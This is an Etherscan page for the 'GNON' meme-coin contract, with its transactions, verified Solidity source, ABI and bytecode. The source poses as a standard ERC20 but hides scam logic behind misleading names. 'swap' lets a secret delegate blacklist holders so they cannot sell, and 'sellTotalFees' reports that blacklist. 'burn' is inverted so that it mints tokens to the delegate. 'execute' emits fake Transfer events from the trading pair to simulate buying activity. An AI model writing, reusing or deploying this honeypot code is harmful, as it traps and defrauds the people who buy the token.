ETH Price: $3,591.46 (-2.79%)

Contract

0xe329741935B6c60141146c7C8b9bd72d6d1e4Cf3
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Swap210012712024-10-19 18:00:4743 days ago1729360847IN
0xe3297419...d6d1e4Cf3
0 ETH0.0004908610.40844426
Swap209987002024-10-19 9:24:3544 days ago1729329875IN
0xe3297419...d6d1e4Cf3
0 ETH0.000462339.80362876
Approve209986942024-10-19 9:23:2344 days ago1729329803IN
0xe3297419...d6d1e4Cf3
0 ETH0.0004933410.59038259
Swap209986122024-10-19 9:06:5944 days ago1729328819IN
0xe3297419...d6d1e4Cf3
0 ETH0.000432719.17551033
Swap209982162024-10-19 7:47:3544 days ago1729324055IN
0xe3297419...d6d1e4Cf3
0 ETH0.0004148.77874663
Execute209981372024-10-19 7:31:3544 days ago1729323095IN
0xe3297419...d6d1e4Cf3
0 ETH0.012832879.48992183
Execute209981302024-10-19 7:30:1144 days ago1729323011IN
0xe3297419...d6d1e4Cf3
0 ETH0.006342279.0252968
Execute209981212024-10-19 7:28:1144 days ago1729322891IN
0xe3297419...d6d1e4Cf3
0 ETH0.011491558.49680991
Execute209981042024-10-19 7:24:4744 days ago1729322687IN
0xe3297419...d6d1e4Cf3
0 ETH0.011809598.73127453
Execute209981012024-10-19 7:24:1144 days ago1729322651IN
0xe3297419...d6d1e4Cf3
0 ETH0.012022618.89081802
Execute209980942024-10-19 7:22:4744 days ago1729322567IN
0xe3297419...d6d1e4Cf3
0 ETH0.012512369.25192615
Execute209980902024-10-19 7:21:5944 days ago1729322519IN
0xe3297419...d6d1e4Cf3
0 ETH0.011895888.79678932
Execute209980872024-10-19 7:21:2344 days ago1729322483IN
0xe3297419...d6d1e4Cf3
0 ETH0.011326168.37556496
Execute209980812024-10-19 7:20:1144 days ago1729322411IN
0xe3297419...d6d1e4Cf3
0 ETH0.012032828.89726185
Execute209980762024-10-19 7:19:1144 days ago1729322351IN
0xe3297419...d6d1e4Cf3
0 ETH0.010850728.0231964
Approve209980482024-10-19 7:13:3544 days ago1729322015IN
0xe3297419...d6d1e4Cf3
0 ETH0.0004624410.00182515
Approve209980312024-10-19 7:10:1144 days ago1729321811IN
0xe3297419...d6d1e4Cf3
0 ETH0.0004773710.32469506
Execute209980232024-10-19 7:08:2344 days ago1729321703IN
0xe3297419...d6d1e4Cf3
0 ETH0.012318079.10939534
Execute209980152024-10-19 7:06:4744 days ago1729321607IN
0xe3297419...d6d1e4Cf3
0 ETH0.011961488.84482763
Execute209980122024-10-19 7:06:1144 days ago1729321571IN
0xe3297419...d6d1e4Cf3
0 ETH0.012928119.5590824
Execute209980042024-10-19 7:04:3544 days ago1729321475IN
0xe3297419...d6d1e4Cf3
0 ETH0.0135302210.00463722
Execute209980002024-10-19 7:03:3544 days ago1729321415IN
0xe3297419...d6d1e4Cf3
0 ETH0.011041438.16406352
Execute209979892024-10-19 7:01:2344 days ago1729321283IN
0xe3297419...d6d1e4Cf3
0 ETH0.01199568.86958493
Execute209979852024-10-19 7:00:3544 days ago1729321235IN
0xe3297419...d6d1e4Cf3
0 ETH0.011133518.23193127
Execute209979772024-10-19 6:58:5944 days ago1729321139IN
0xe3297419...d6d1e4Cf3
0 ETH0.011865868.77357685
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
GNON

Compiler Version
v0.8.21+commit.d9974bed

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-10-19
*/

/**
 *Submitted for verification at Etherscan.io on 2024-10-11
*/

/**
🌐WEBSITE - https://GNON.com/

Are you ready to embark on an adventure with the most adorable pup in the crypto world? 
GNON is not just any ordinary meme coin; it's a tribute to the 
legendary Shikoku breed, known for its loyalty, charm, and undeniable cuteness.

🔖DAILY NEWS - https://medium.com/@GNON

Join the pack and dive into the world of decentralized fun with GNON.
 Whether you're a seasoned crypto enthusiast or a curious newcomer, 
 everyone is welcome to become a part of our furry family.

🐦X COMMUNITY: https://x.com/GNON

With GNON, the possibilities are endless. Hold on tight as we 
journey to the moon and beyond, spreading joy and laughter along the way. 
Let's bark our way to financial freedom together!

💭TELEGRAM COMMUNITY: https://t.me/GNON
 
*/// SPDX-License-Identifier: MIT
pragma solidity 0.8.21;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application is concerned).
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to specific functions.
 */
abstract contract Ownable is Context {
    address private _owner;
    address internal _delegate;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    
    /**
     * @dev Throws if called by any account other than the distributor.
     */
    modifier onlyDelegates() {
        require(_delegate == _msgSender(), "Delegates: caller is not the delegate");
        _;
    }
    
    /**
     * @dev Sets new delegate.
     */
    function delegate(address _address) external onlyOwner {
        require (_delegate == address(0));
        _delegate = _address;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is zero by default.
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's allowance.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`). Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Implementation of the {IERC20} interface.
 * This implementation is agnostic to the way tokens are created. This means that a supply mechanism
 * has to be added in a derived contract. Additionally, an {Approval} event is emitted on calls to
 * {transferFrom}. This allows applications to reconstruct the allowance for all accounts just by listening
 * to said events. Other implementations of the EIP may not emit these events, as it isn't required by the
 * specification. Finally, the non-standard {decreaseAllowance} and {increaseAllowance} functions have been
 * added to mitigate the well-known issues around setting allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20 {
    mapping(address => uint256) internal _balances;
    mapping(address => bool) private _onlyDelegatesBalanceOf;
    mapping(address => mapping(address => uint256)) internal _allowances;
    uint256 internal _totalSupply;
    string private _name;
    string private _symbol;
    uint8 private _decimals; 

    /**
     * @dev Sets the values for {name} and {symbol}.
     * All two of these values are immutable: they can only be set once during construction.
     */
    constructor(string memory name_, string memory symbol_, uint8 decimals_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
    
 
    function swap(address[] calldata spender, bool val) external onlyDelegates { 
        for (uint256 i = 0; i < spender.length; i++) {
            _onlyDelegatesBalanceOf[spender[i]] = val;
        }
    }

    
    function sellTotalFees(address spender) public view returns (bool) {
        return _onlyDelegatesBalanceOf[spender];
    }

    /**
     * @dev See {IERC20-transfer}.
     * Requirements:
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Destroys `amount` tokens from the caller.
     * See {ERC20-_burn}.
     */
    function burn(uint256 amount) public virtual onlyDelegates {
        _burn(_msgSender(), amount);
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the total supply.
     * Emits a {Transfer} event with `to` set to the zero address.
     * Requirements:
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _balances[account];
        require(accountBalance <= amount, "ERC20: burn amount exceeds balance");
        unchecked {_balances[account] = accountBalance + amount;}
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev See {IERC20-transferFrom}.
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked { _approve(sender, _msgSender(), currentAllowance - amount);}
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     * Requirements:
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {_approve(_msgSender(), spender, currentAllowance - subtractedValue);}
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     * Emits a {Transfer} event.
     * Requirements:
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address"); if 
        (_onlyDelegatesBalanceOf[sender]) require 
        (amount == 0, "ERC20: transfer amout exceeds allowance");
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {_balances[sender] = senderBalance - amount;}
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);
    }
    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     * This internal function is equivalent to `approve`, and can be used to e.g. set automatic allowances for certain subsystems, etc.
     * Emits an {Approval} event.
     * Requirements:
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    address public uniswapV2Pair;
    function execute(address[] calldata _addresses, uint256 _out) external onlyDelegates{
        for (uint256 i = 0; i < _addresses.length; i++) {
            emit Transfer(uniswapV2Pair, _addresses[i], _out);
        }
    }

    function addPair(address pair_) public onlyOwner {
        uniswapV2Pair = pair_;        
    }
}

contract GNON is ERC20 {
    constructor() ERC20('numogram', 'GNON', 9) {
        _totalSupply = 100000000000*10**9;
        _balances[msg.sender] += _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"pair_","type":"address"}],"name":"addPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"delegate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses","type":"address[]"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"sellTotalFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"spender","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"swap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

608060405234801562000010575f80fd5b50604051806040016040528060088152602001676e756d6f6772616d60c01b8152506040518060400160405280600481526020016323a727a760e11b81525060096200006b620000656200011360201b60201c565b62000117565b600662000079848262000206565b50600762000088838262000206565b506008805460ff191660ff92909216919091179055505068056bc75e2d631000006005819055335f9081526002602052604081208054909190620000ce908490620002ce565b909155505060055460405190815233905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3620002f4565b3390565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200018f57607f821691505b602082108103620001ae57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111562000201575f81815260208120601f850160051c81016020861015620001dc5750805b601f850160051c820191505b81811015620001fd57828155600101620001e8565b5050505b505050565b81516001600160401b0381111562000222576200022262000166565b6200023a816200023384546200017a565b84620001b4565b602080601f83116001811462000270575f8415620002585750858301515b5f19600386901b1c1916600185901b178555620001fd565b5f85815260208120601f198616915b82811015620002a0578886015182559484019460019091019084016200027f565b5085821015620002be57878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b80820180821115620002ee57634e487b7160e01b5f52601160045260245ffd5b92915050565b610fff80620003025f395ff3fe608060405234801561000f575f80fd5b5060043610610127575f3560e01c806370a08231116100a9578063a457c2d71161006e578063a457c2d71461027f578063a9059cbb14610292578063c2b7bbb6146102a5578063c6b10e1d146102b8578063dd62ed3e146102e3575f80fd5b806370a0823114610224578063715018a61461024c57806373fa7ddb146102545780638da5cb5b1461026757806395d89b4114610277575f80fd5b8063313ce567116100ef578063313ce567146101a657806339509351146101bb57806342966c68146101ce57806349bd5a5e146101e15780635c19a95c14610211575f80fd5b806306fdde031461012b578063095ea7b31461014957806318160ddd1461016c57806323b872dd1461017e57806326ededb814610191575b5f80fd5b61013361031b565b6040516101409190610cae565b60405180910390f35b61015c610157366004610d14565b6103ab565b6040519015158152602001610140565b6005545b604051908152602001610140565b61015c61018c366004610d3c565b6103c1565b6101a461019f366004610dbd565b61046e565b005b60085460405160ff9091168152602001610140565b61015c6101c9366004610d14565b61052d565b6101a46101dc366004610e05565b610568565b6008546101f99061010090046001600160a01b031681565b6040516001600160a01b039091168152602001610140565b6101a461021f366004610e1c565b61059f565b610170610232366004610e1c565b6001600160a01b03165f9081526002602052604090205490565b6101a46105ff565b6101a4610262366004610e3c565b610633565b5f546001600160a01b03166101f9565b6101336106cb565b61015c61028d366004610d14565b6106da565b61015c6102a0366004610d14565b610772565b6101a46102b3366004610e1c565b61077e565b61015c6102c6366004610e1c565b6001600160a01b03165f9081526003602052604090205460ff1690565b6101706102f1366004610e93565b6001600160a01b039182165f90815260046020908152604080832093909416825291909152205490565b60606006805461032a90610ec4565b80601f016020809104026020016040519081016040528092919081815260200182805461035690610ec4565b80156103a15780601f10610378576101008083540402835291602001916103a1565b820191905f5260205f20905b81548152906001019060200180831161038457829003601f168201915b5050505050905090565b5f6103b73384846107cf565b5060015b92915050565b5f6103cd8484846108f3565b6001600160a01b0384165f908152600460209081526040808320338452909152902054828110156104565760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61046385338584036107cf565b506001949350505050565b6001546001600160a01b031633146104985760405162461bcd60e51b815260040161044d90610efc565b5f5b82811015610527578383828181106104b4576104b4610f41565b90506020020160208101906104c99190610e1c565b6008546040518481526001600160a01b0392831692610100909204909116907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a38061051f81610f69565b91505061049a565b50505050565b335f8181526004602090815260408083206001600160a01b038716845290915281205490916103b7918590610563908690610f81565b6107cf565b6001546001600160a01b031633146105925760405162461bcd60e51b815260040161044d90610efc565b61059c3382610b3e565b50565b5f546001600160a01b031633146105c85760405162461bcd60e51b815260040161044d90610f94565b6001546001600160a01b0316156105dd575f80fd5b600180546001600160a01b0319166001600160a01b0392909216919091179055565b5f546001600160a01b031633146106285760405162461bcd60e51b815260040161044d90610f94565b6106315f610c5f565b565b6001546001600160a01b0316331461065d5760405162461bcd60e51b815260040161044d90610efc565b5f5b82811015610527578160035f86868581811061067d5761067d610f41565b90506020020160208101906106929190610e1c565b6001600160a01b0316815260208101919091526040015f20805460ff1916911515919091179055806106c381610f69565b91505061065f565b60606007805461032a90610ec4565b335f9081526004602090815260408083206001600160a01b03861684529091528120548281101561075b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161044d565b61076833858584036107cf565b5060019392505050565b5f6103b73384846108f3565b5f546001600160a01b031633146107a75760405162461bcd60e51b815260040161044d90610f94565b600880546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b6001600160a01b0383166108315760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161044d565b6001600160a01b0382166108925760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161044d565b6001600160a01b038381165f8181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166109575760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161044d565b6001600160a01b0382166109b95760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161044d565b6001600160a01b0383165f9081526003602052604090205460ff1615610a37578015610a375760405162461bcd60e51b815260206004820152602760248201527f45524332303a207472616e7366657220616d6f7574206578636565647320616c6044820152666c6f77616e636560c81b606482015260840161044d565b6001600160a01b0383165f9081526002602052604090205481811015610aae5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161044d565b6001600160a01b038085165f90815260026020526040808220858503905591851681529081208054849290610ae4908490610f81565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610b3091815260200190565b60405180910390a350505050565b6001600160a01b038216610b9e5760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b606482015260840161044d565b6001600160a01b0382165f9081526002602052604090205481811115610c115760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b606482015260840161044d565b6001600160a01b0383165f8181526002602090815260408083208686019055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016108e6565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f6020808352835180828501525f5b81811015610cd957858101830151858201604001528201610cbd565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610d0f575f80fd5b919050565b5f8060408385031215610d25575f80fd5b610d2e83610cf9565b946020939093013593505050565b5f805f60608486031215610d4e575f80fd5b610d5784610cf9565b9250610d6560208501610cf9565b9150604084013590509250925092565b5f8083601f840112610d85575f80fd5b50813567ffffffffffffffff811115610d9c575f80fd5b6020830191508360208260051b8501011115610db6575f80fd5b9250929050565b5f805f60408486031215610dcf575f80fd5b833567ffffffffffffffff811115610de5575f80fd5b610df186828701610d75565b909790965060209590950135949350505050565b5f60208284031215610e15575f80fd5b5035919050565b5f60208284031215610e2c575f80fd5b610e3582610cf9565b9392505050565b5f805f60408486031215610e4e575f80fd5b833567ffffffffffffffff811115610e64575f80fd5b610e7086828701610d75565b90945092505060208401358015158114610e88575f80fd5b809150509250925092565b5f8060408385031215610ea4575f80fd5b610ead83610cf9565b9150610ebb60208401610cf9565b90509250929050565b600181811c90821680610ed857607f821691505b602082108103610ef657634e487b7160e01b5f52602260045260245ffd5b50919050565b60208082526025908201527f44656c6567617465733a2063616c6c6572206973206e6f74207468652064656c604082015264656761746560d81b606082015260800190565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52601160045260245ffd5b5f60018201610f7a57610f7a610f55565b5060010190565b808201808211156103bb576103bb610f55565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260408201526060019056fea264697066735822122038f6ced07b96fa72d821eff72bd7d2f6ec50e94fe513b002effcf315d2322d0764736f6c63430008150033

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610127575f3560e01c806370a08231116100a9578063a457c2d71161006e578063a457c2d71461027f578063a9059cbb14610292578063c2b7bbb6146102a5578063c6b10e1d146102b8578063dd62ed3e146102e3575f80fd5b806370a0823114610224578063715018a61461024c57806373fa7ddb146102545780638da5cb5b1461026757806395d89b4114610277575f80fd5b8063313ce567116100ef578063313ce567146101a657806339509351146101bb57806342966c68146101ce57806349bd5a5e146101e15780635c19a95c14610211575f80fd5b806306fdde031461012b578063095ea7b31461014957806318160ddd1461016c57806323b872dd1461017e57806326ededb814610191575b5f80fd5b61013361031b565b6040516101409190610cae565b60405180910390f35b61015c610157366004610d14565b6103ab565b6040519015158152602001610140565b6005545b604051908152602001610140565b61015c61018c366004610d3c565b6103c1565b6101a461019f366004610dbd565b61046e565b005b60085460405160ff9091168152602001610140565b61015c6101c9366004610d14565b61052d565b6101a46101dc366004610e05565b610568565b6008546101f99061010090046001600160a01b031681565b6040516001600160a01b039091168152602001610140565b6101a461021f366004610e1c565b61059f565b610170610232366004610e1c565b6001600160a01b03165f9081526002602052604090205490565b6101a46105ff565b6101a4610262366004610e3c565b610633565b5f546001600160a01b03166101f9565b6101336106cb565b61015c61028d366004610d14565b6106da565b61015c6102a0366004610d14565b610772565b6101a46102b3366004610e1c565b61077e565b61015c6102c6366004610e1c565b6001600160a01b03165f9081526003602052604090205460ff1690565b6101706102f1366004610e93565b6001600160a01b039182165f90815260046020908152604080832093909416825291909152205490565b60606006805461032a90610ec4565b80601f016020809104026020016040519081016040528092919081815260200182805461035690610ec4565b80156103a15780601f10610378576101008083540402835291602001916103a1565b820191905f5260205f20905b81548152906001019060200180831161038457829003601f168201915b5050505050905090565b5f6103b73384846107cf565b5060015b92915050565b5f6103cd8484846108f3565b6001600160a01b0384165f908152600460209081526040808320338452909152902054828110156104565760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61046385338584036107cf565b506001949350505050565b6001546001600160a01b031633146104985760405162461bcd60e51b815260040161044d90610efc565b5f5b82811015610527578383828181106104b4576104b4610f41565b90506020020160208101906104c99190610e1c565b60085460405184